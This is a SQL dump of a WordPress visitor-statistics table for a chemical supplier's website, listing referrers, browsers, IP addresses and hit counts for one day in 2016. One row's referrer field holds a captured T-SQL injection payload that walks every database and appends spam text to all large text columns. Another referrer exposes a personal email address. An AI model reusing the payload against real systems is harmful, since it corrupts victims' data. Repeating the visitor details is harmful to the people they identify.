INSERT INTO `wp_statistics_visitor` VALUES (2982, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2983, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2984, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.67.44.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2985, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '69.59.67.120', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2986, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.11.128.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2987, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '174.139.6.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2988, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.1', '', '108.168.39.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2989, '2016-10-12', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '17.0', '', '23.245.152.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2990, '2016-10-12', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '23.245.152.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2991, '2016-10-12', 'https://www.miller-stephenson.com/', 'PHP', 'Unknown', '5.', '', '23.245.152.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2992, '2016-10-12', 'https://www.miller-stephenson.com', 'PHP', 'Unknown', '5.3.86', '', '70.181.89.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2993, '2016-10-12', 'https://www.bing.com/search?q=epon+862+tds&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2994, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '17.0', '', '70.181.89.71', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2995, '2016-10-12', 'https://www.miller-stephenson.com/product/epon-862/', 'MSIE', 'Windows', '9.0', '', '204.79.180.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2996, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.149.3.9', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2997, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2998, '2016-10-12', 'https://www.google.co.il/', 'Safari', 'iPad', '600.1.4', '', '5.29.174.211', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (2999, '2016-10-12', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '53.0.2785.124', '', '98.239.86.10', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3000, '2016-10-12', 'https://www.google.com.hk/', 'Firefox', 'Windows', '49.0', '', '203.198.211.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3001, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '98.234.97.68', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3002, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '69.29.66.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3003, '2016-10-12', 'https://thewombforums.com/showthread.php?19263-Cleaning-Patchbays', 'Chrome', 'Windows', '53.0.2785.143', '', '67.182.116.68', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3004, '2016-10-12', 'https://l.facebook.com/lsr.php?u=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-738%2F&ext=1476245163&hash=AcmhE1FHL02cExdvdf7v3NSyCNJu0pV7XMi4Jd-gpRQesQ', 'Chrome', 'Macintosh', '53.0.2785.143', '', '66.220.145.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3005, '2016-10-12', 'https://l.facebook.com/lsr.php?u=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-738&ext=1476245167&hash=AclbWrsaGPGVCxkuDVzC-AHZk0f5fBZ6KO9yL6kKIFl6JA', 'Chrome', 'Windows', '53.0.2785.143', '', '66.220.145.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3006, '2016-10-12', 'https://www.miller-stephenson.com/product/ms-738/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.220.145.244', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3007, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.18', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3008, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '199.87.137.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3009, '2016-10-12', 'https://google.com\\\\\\\';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in (\\\\\\\'master\\\\\\\',\\\\\\\'tempdb\\\\\\\',\\\\\\\'model\\\\\\\',\\\\\\\'msdb\\\\\\\',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s=\\\\\\\'begin try use [\\\\\\\'+@w+\\\\\\\'];declare @c cursor;declare @d varchar(4000);set @c=cursor for select \\\\\\\'\\\\\\\'update [\\\\\\\'\\\\\\\'+TABLE_NAME+\\\\\\\'\\\\\\\'] set [\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']=[\\\\\\\'\\\\\\\'+COLUMN_NAME+\\\\\\\'\\\\\\\']+case ABS(CHECKSUM(NewId()))%9 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'abortion pictures \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'+case ABS(CHECKSUM(NewId()))%3 when 0 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'read\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' when 1 then \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'mondial-defence.com\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'mondial-defence.com\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end +\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' abortion controversy\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' else \\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\'\\\\\\\' end\\\\\\\'\\\\\\\' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like \\\\\\\'\\\\\\\'%varchar\\\\\\\'\\\\\\\' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch\\\\\\\';exec (@s);fetch next from @b into @w;end;close @b--', 'Firefox', 'Windows', '24.0', '', '137.117.80.189', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3010, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.121.169', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3011, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '210.6.7.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3012, '2016-10-12', 'https://www.google.com/url?url=https://www.miller-stephenson.com/miller/pdf/MS-555,%2520557.pdf&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiYss2FudTPAhVllFQKHXNUDQ4QFggaMAE&sig2=GG8pzZFeOPfb1ONUZ58mQw&usg=AFQjCNFJqBPG6-Cmyp8Rfr3Xzx50HcXHtQ', 'MSIE', 'Windows', '8.0', '', '58.26.106.196', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3013, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3014, '2016-10-12', 'https://www.kbdmania.net/xe/photo/4413494', 'MSIE', 'Windows', '11.0', '', '121.162.233.165', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3015, '2016-10-12', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '140.207.198.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3016, '2016-10-12', 'https://www.google.co.jp/', 'Chrome', 'Windows', '53.0.2785.143', '', '106.186.201.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3017, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '53.0.2785.143', '', '103.232.232.132', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3018, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3019, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.109', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3020, '2016-10-12', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.218.89.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3021, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '128.157.160.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3022, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CEMQFjAF&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fvazo_overview.html&ei=j8z9V-vaA8St0QH8pQE&usg=AFQjCNESI5yDu11sJVIRdHyRBsQiHWCyHw', 'MSIE', 'Windows', '11.0', '', '66.102.6.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3023, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/vazo-radical-initiators/', 'MSIE', 'Windows', '11.0', '', '66.102.6.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3024, '2016-10-12', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3025, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '124.238.96.131', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3026, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '223.30.141.69', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3027, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '53.0.2785.124', '', '37.105.224.116', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3028, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3029, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3030, '2016-10-12', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '17.0', '', '104.223.30.103', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3031, '2016-10-12', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.223.30.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3032, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '50.0.2661.87', '', '115.113.194.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3033, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3034, '2016-10-12', 'https://webcache.googleusercontent.com/search?q=cache:https://www.miller-stephenson.com/product/xht-bdx/&gws_rd=cr&ei=7OD9V-exNsnuaqnNhJAH', 'Chrome', 'Windows', '53.0.2785.143', '', '62.244.113.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3035, '2016-10-12', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=7ZEN.A.KULYNYCH.SIV%40mail.mil&eresponse=1&category_id=52031&category_id=52039&category_id=52041&category_id=52037&category_id=52040&category_id=52028&category_id=52035&category_id=52038&category_id=52036&category_id=52029&category_id=52034', 'Chrome', 'Windows', '49.0.2623.112', '', '115.112.106.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3036, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '93.142.237.197', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3037, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '68.201.36.217', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3038, '2016-10-12', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3039, '2016-10-12', 'https://www.miller-stephenson.com/product/vazo-67/', 'Chrome', 'Windows', '53.0.2785.101', '', '149.216.89.154', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3040, '2016-10-12', 'https://www.google.co.in/', 'Chrome', 'Windows', '49.0.2623.112', '', '103.12.195.133', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3041, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/solvents/', 'Firefox', 'Windows', '49.0', '', '31.6.74.194', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3042, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3043, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.39.130.153', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3044, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '180.76.15.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3045, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '25.0', '', '23.239.167.205', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3046, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '24.0', '', '46.22.212.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3047, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '91.200.12.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3048, '2016-10-12', 'https://www.google.co.in', 'Firefox', 'Windows', '43.0', '', '117.213.3.195', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3049, '2016-10-12', 'https://www.google.co.za/', 'Chrome', 'Windows', '53.0.2785.143', '', '41.162.59.203', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3050, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '80.79.114.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3051, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.243.250', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3052, '2016-10-12', 'https://r.search.yahoo.com/_ylt=AwrTcd238P1X.jIAJeAPxQt.;_ylu=X3oDMTByb2lvbXVuBGNvbG8DZ3ExBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476288824/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fchemicals%2fvazo-radical-initiators%2f/RK=0/RS=qFgHxOrrjsKYeX6IKGgd5wDxORY-', 'MSIE', 'Windows', '9.0', '', '143.248.74.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3053, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.199.9.193', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3054, '2016-10-12', 'https://www.baidu.com/link?url=nddZu5VA2pclMSWJUyMP2bEVmIbVsFU9rnioMWwY-p70lxYDjzpH4jTCH2Q-ZnWl5J_0j_CUqWNfdtGZm0rkiJVDTSKIburycIYCYN5NSWi&wd=&eqid=f05c5afe0000c6960000000557fdf153', 'Edge', 'Windows', '13.10586', '', '180.108.169.39', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3055, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '31.0', '', '212.69.191.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3056, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '108.82.83.234', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3057, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '206.217.215.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3058, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Macintosh', '11.52', '', '212.69.166.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3059, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '216.146.137.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3060, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '95.143.46.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3061, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '217.18.245.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3062, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0.1', '', '65.49.1.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3063, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '91.223.159.163', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3064, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.0', '', '217.172.39.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3065, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.0', '', '99.192.46.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3066, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '31.0', '', '162.255.152.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3067, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '35.0.2117.157', '', '75.165.59.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3068, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '67.213.215.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3069, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '28.0', '', '217.18.246.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3070, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '36.0.1944.0', '', '185.75.242.169', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3071, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '23.226.220.40', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3072, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '31.0', '', '207.195.235.39', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3073, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '25.0', '', '185.2.248.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3074, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '35.0.1916.47', '', '99.192.46.111', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3075, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '149.5.113.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3076, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '21.0', '', '185.75.242.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3077, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '31.0.1650.16', '', '23.226.220.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3078, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '107.155.197.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3079, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '213.179.223.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3080, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '67.203.1.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3081, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '5.1', '', '80.79.123.30', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3082, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '54.244.31.85', '000', 343, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3083, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.62', '', '206.217.215.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3084, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.244.31.85', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3085, '2016-10-12', 'https://www.google.co.in/', 'Firefox', 'Windows', '49.0', '', '121.243.44.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3086, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3087, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3088, '2016-10-12', 'https://www.google.ru/', 'Chrome', 'Windows', '53.0.2785.143', '', '91.211.219.58', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3089, '2016-10-12', 'https://www.miller-stephenson.com', 'curl', 'Unknown', '7.35.0', '', '104.131.45.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3090, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2049.0', '', '96.46.49.21', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3091, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.10', '', '37.247.124.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3092, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Macintosh', '11.52', '', '63.223.124.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3093, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '21.0', '', '107.155.194.55', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3094, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '91.223.159.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3095, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2049.0', '', '207.195.228.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3096, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '75.34.101.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3097, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '217.18.244.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3098, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '37.247.123.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3099, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '12.14', '', '75.34.101.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3100, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.0.4', '', '65.49.1.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3101, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '21.0', '', '207.195.235.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3102, '2016-10-12', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '11.1', '', '217.79.249.97', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3103, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '208.72.119.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3104, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '37.0.2049.0', '', '185.35.20.175', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3105, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2225.0', '', '217.79.249.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3106, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '22.0', '', '94.103.36.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3107, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2226.0', '', '23.239.163.161', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3108, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '31.0', '', '162.254.86.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3109, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '21.0', '', '96.46.60.24', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3110, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '99.192.47.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3111, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '23.0', '', '185.75.240.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3112, '2016-10-12', 'https://www.miller-stephenson.com', 'IEMobile', 'Windows Phone', '7.0', '', '23.239.160.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3113, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '5.0.4', '', '108.82.82.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3114, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '85.93.21.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3115, '2016-10-12', 'https://www.miller-stephenson.com', 'Android Browser', 'Android', '4.0', '', '108.82.82.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3116, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '108.82.82.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3117, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '46.0.2490.76', '', '172.56.30.169', '000', 2, 0); 
